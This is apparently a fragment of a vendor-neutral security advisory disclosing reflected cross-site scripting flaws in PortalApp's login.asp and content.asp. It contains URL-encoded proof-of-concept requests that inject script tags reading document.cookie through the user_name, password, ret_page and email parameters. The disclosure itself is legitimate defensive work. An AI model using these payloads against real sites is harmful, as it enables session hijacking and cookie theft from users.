High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PortalApp which could be exploited to perform cross-site scripting attacks.
s browser in context of the vulnerable website. Exploitation examples: http://host/login.asp?user_name=%27%22%3E%3Cscript%3Ealert%28document.cookie %29%3C/script%3E&passwor d=&ret_page= http://host/login.asp?user_name=&password=%27%22%3E%3Cscript%3 Ealert%28document.cook ie%29%3C/script%3E&ret_page= http://host/login.asp?user_name=&password=&ret _page=%27%22%3E%3Cscri pt%3Ealert%28document.cookie%29%3C/script%3E http://host/login.asp?email=sd %40sd.df%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&s earch_btn=SEND&action=lookup&do_search=1 1.2 The vulnerability exists due to input sanitation error in the "keywords" parameter in content.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user
s browser in context of the vulnerable website.